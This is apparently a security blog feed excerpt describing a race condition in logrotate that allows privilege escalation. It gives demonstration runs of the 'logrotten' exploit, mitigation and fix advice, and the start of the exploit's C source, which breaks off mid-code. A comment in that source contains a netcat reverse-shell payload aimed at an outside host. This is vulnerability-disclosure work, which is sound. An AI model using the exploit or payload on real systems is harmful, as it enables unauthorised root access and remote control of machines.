bold;">/</span>file.log </pre></div></pre> <p>User www-data can manipulate the path above the log directory:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">3</span> www-data root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">26</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project </pre></div></pre> <p>Logrotate configuration having the “create” directive:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log <span style="color: #7a0874; font-weight: bold;">{</span> daily rotate <span style="color: #000000;">12</span> missingok notifempty <span style="color: #c20cb9; font-weight: bold;">size</span> 1k create <span style="color: #7a0874; font-weight: bold;">}</span></pre></div></pre> <p>www-data is allowed to rename the directory /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #c20cb9; font-weight: bold;">mv</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html2 </pre></div></pre> <p>www-data can create a new logdir and it will have write permissions for www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir </pre></div></pre> <p>www-data can write into the new logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">"hello world"</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>Permissions of /var/www/project/html/logdir/file.log:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> www-data www-data <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">31</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p> </p> <p>User www-data executes the exploit and waits until logrotate will be started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The new file was created in /etc/bash_completion.de with owner www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> www-data www-data <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">35</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <h3>4) Logrotate runs as low privileged user having the “su”-directive set. The path to the log directory is in control of a user of a group.</h3> <p>Using the “su”-directive is not save per se. It prevents attackers from getting root privileges, but it is still possible to gain the privileges of another user.</p> <p>Directories of /var/www are owned by www-data. Only logdirs is writeable by members of the group “loggrp”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">2</span> www-data www-data <span style="color: #000000;">4096</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">21</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html drwxrwxr-x <span style="color: #000000;">3</span> www-data loggrp <span style="color: #000000;">4096</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">24</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs</pre></div></pre> <p>The users www-data and myserv are members of the group loggrp:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  loggrp:x:<span style="color: #000000;">1001</span>:www-data,myserv </pre></div></pre> <p>Logrotate is configured with the “su”-directive. It will rotate logs with the privileges of www-data instead of root. The target /var/www/logdirs/example.com/* makes sure that all files inside the log directory will be rotated:</p> <pre> <code> /var/www/logdirs/example.com/* { daily rotate 12 missingok notifempty size 1k create www-data loggrp su www-data loggrp } </code></pre> <p>User “myserv” executes the exploit with the target directory “/var/www/html”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666;">myserv@localhost$ </span>.<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-t</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com<span style="color: #000000; font-weight: bold;">/</span>shell.php Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com<span style="color: #000000; font-weight: bold;">/</span>shell.php... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>User “myserv” is now able to write any php-shell into the new created file:</p> <p> </p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-rw-r--</span> <span style="color: #000000;">1</span> www-data loggrp <span style="color: #000000;">0</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">47</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>shell.php </pre></div></pre> <h2>Mitigation</h2> <p>This vulnerability occurs if log files are rotated in insecure directories. Even though the “su”-directive of logrotate can prevent an attacker from becoming root, it still leaves the opportunity open to escalate to another system user(as shown in example 4).</p> <p>One way to mitigate the problem is using Apparmor or SElinux.</p> <h2>Fix</h2> <p>Vulnerable setups can be easily fixed by making sure that the path to the log directory can only be manipulated by root or the owner of the log directory. However, a vulnerable setup is not always obvious. Therefore logrotate should check the complete path to the log directory. If one element of the path is not secure logrotate has to abort with an error. Algorithms for checking a directory path could be found on the following pages:</p> <ul><li> <p><a href="http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf">http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf</a></p> </li> <li> <p><a href="https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory">https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory</a></p> </li> </ul><p>Deploying such a fix might have a huge impact. If it would be deployed at large scale it could break existing installations because it prevents logrotate from rotating in insecure setups.</p> <h2>Conclusion</h2> <p>Logrotate is widely used for rotating logfiles. As the examples above have shown, insecure configurations are not always obvious. Even though a fix could prevent privilege escalations, it might also stop logrotate from working in insecure setups.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 01 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=276&amp;2=comment&amp;3=comment" token="nAADQ8ixeyZnHqkBiPI1IjBgknj5s0ksfUzPqHOr45A"></drupal-render-placeholder> </section> Wed, 01 May 2019 11:04:35 +0000 Hoti 276 at https://tech.feedyourhead.at Abusing a race condition in logrotate to elevate privileges https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges <span class="field field--name-title field--type-string field--label-hidden">Abusing a race condition in logrotate to elevate privileges</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Together with a friend we took part of the Capture The Flag at the 35C3. One challenge was that one:</p> <blockquote> <p>Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.</p> </blockquote> <p>After searching at google I found out about a race condition in logrotate. In many <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=400198">bug reports</a> it was stated that a race condition exists <s>if logrotate gets executed with the "create" option</s>. A very detailed and brilliant analysis of the problem could be found at the blog of the <a href="https://blog.nsogroup.com/logrotate-zajebiste-500-points/">nsogroup</a>. Their exploit was very specific for the CTF challenge and it needs a suid binary that executes run-parts(cron). It worked for the CTF and I guess they earned their points. I was too slow and did not solve the challenge but I tried to finish it at home. My approach was to use inotify on /tmp/log/pwn.log to trigger the race. It seems that the logrotate bug could be exploited on live environments.</p> <h3>Requirements</h3> <p>In order to exploit this vulnerability for privilege escalation the following requirements must be met:</p> <ul> <li>logrotate has to be run as user root</li> <li>an unprivileged user has to be in control of the logdir-path</li> <li>the configfile should include any directive that creates new files.</li> </ul> <p>An attacker could elevate his privileges by writing reverse-shells into directories like "/etc/bash_completition.d/". This is how the logrotate-config looks like:</p> <pre> <code> /tmp/log/pwnme.log { daily rotate 12 missingok notifempty size 1k create } </code></pre> <p>My unprivileged user is totally in control of /tmp/log/:</p> <pre> <code> osboxes@osboxes:~$ ls -l /tmp/log total 2940 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.0 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.1 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.10 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.11 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.12 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.13 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.2 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.3 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.4 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.5 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.6 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.7 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.8 -rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.9 osboxes@osboxes:~$ ls -ld /tmp/log drwxr-xr-x 2 osboxes osboxes 4096 Jan 14 15:34 /tmp/log </code></pre> <h3>Exploit</h3> <p>The vulnerability can be triggerd by replacing /tmp/log by a symlink to /etc/bash_completition.d after /tmp/log/pwnme.log got renamed. I wrote the following <a href="https://github.com/whotwagner/logrotten">Exploit</a>:</p> <pre> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">/* * logrotate poc exploit * * [ Brief description ] * - logrotate is prone to a race condition after renaming the logfile. * - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories. * - An attacker could elevate his privileges by writing reverse-shells into * directories like &quot;/etc/bash_completition.d/&quot;. * - This vulnerability was found during a challenge at the 35c3 CTF * ( https://ctftime.org/event/718 ) * - A detailed description and a PoC of this challenge was written by the * - nsogroup ( https://blog.nsogroup.com/logrotate-zajebiste-500-points/ ) * * [ Precondition for privilege escalation ] * - Logrotate needs to be executed as root * - The logpath needs to be in control of the attacker * - &quot;create&quot; option is set in the logrotate configuration. * This exploit might not work without * * [ Tested version ] * - Debian GNU/Linux 9.5 (stretch) * - Amazon Linux 2 AMI (HVM) * - Ubuntu 18.04.1 * - logrotate 3.8.6 * - logrotate 3.11.0 * - logrotate 3.15.0 * * [ Compile ] * - gcc -o logrotten logrotten.c * * [ Prepare payload ] * - echo &quot;if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &amp;); fi&quot; &gt; payloadfile * * [ Run exploit ] * - nice -n -20 ./logrotten /tmp/log/pwnme.log payloadfile * * [ Known Problems ] * - It's hard to win the race inside a docker container * * [ Mitigation ] * - make sure that logpath is owned by root * - or use option &quot;nocreate&quot; * * [ Author ] * - Wolfgang Hotwagner * * [ Contact ] * - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges * - https://github.com/whotwagner/logrotten */</span> &nbsp; <span style="color: #339933;">#include &lt;stdio.h&gt;</span> <span style="color: #339933;">#include &lt;stdlib.h&gt;</span> <span style="color: #339933;">#include &lt;errno.h&gt;</span> <span style="color: #339933;">#include &lt;sys/types.h&gt;</span> <span style="color: #339933;">#include &lt;sys/inotify.h&gt;</span> <span style="color: #339933;">#include &lt;unistd.h&gt;</span> <span style="color: #339933;">#include &lt;string.h&gt;</span> <span style="color: #339933;">#include &lt;alloca.h&gt;</span> <span style="color: #339933;">#include &lt;sys/stat.h&gt;</span> &nbsp; &nbsp; <span style="color: #339933;">#define EVENT_SIZE ( sizeof (struct inotify_event) )</span> <span style="color: #339933;">#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )</span> &nbsp; <span style="color: #808080; font-style: italic;">/* use TARGETDIR without &quot;/&quot; at the end */</span> <span style="color: #339933;">#define TARGETDIR &quot;/etc/bash_completion.d&quot;</span> &nbsp; <span style="color: #339933;">#define DEBUG 1</span> &nbsp; <span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #993333;">int</span> argc<span style="color: #339933;">,</span> <span style="color: #993333;">char</span><span style="color: #339933;">*</span> argv<span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">int</span> length<span style="color: #339933;">,</span> i <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> index <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> <span style="color: #993333;">int</span> fd<span style="color: #339933;">;</span> <span style="color: #993333;">int</span> wd<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> buffer<span style="color: #009900;">&#91;</span>EVENT_BUF_LEN<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>payloadfile<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logfile<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>logpath2<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetpath<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>targetdir<span style="color: #339933;">;</span> <span style="color: #993333;">char</span> ch<span style="color: #339933;">;</span> <span style="color: #993333;">const</span> <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>p<span style="color: #339933;">;</span> FILE <span style="color: #339933;">*</span>source<span style="color: #339933;">,</span> <span style="color: #339933;">*</span>target<span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&lt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fprintf.html"><span style="color: #000066;">fprintf</span></a><span style="color: #009900;">&#40;</span>stderr<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;usage: %s &lt;logfile&gt; &lt;payloadfile&gt; [targetdir]<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; logfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> payloadfile <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j<span style="color: #339933;">=</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">!=</span> <span style="color: #ff0000;">'/'</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #009900;">&#40;</span>j <span style="color: #339933;">!=</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> j<span style="color: #339933;">--</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; index <span style="color: #339933;">=</span> j<span style="color: #339933;">+</span><span style="color: #0000dd;">1</span><span style="color: #339933;">;</span> &nbsp; p <span style="color: #339933;">=</span> <span style="color: #339933;">&amp;</span>logfile<span style="color: #009900;">&#91;</span>index<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; logpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2 <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&gt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> targetdir <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span> targetdir<span style="color: #339933;">=</span> TARGETDIR<span style="color: #339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> targetpath<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span><span style="color: #ff0000;">&quot;/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j <span style="color: #339933;">&lt;</span> index<span style="color: #339933;">;</span> j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcpy.html"><span style="color: #000066;">strcpy</span></a><span style="color: #009900;">&#40;</span>logpath2<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'2'</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*creating the INOTIFY instance*/</span> fd 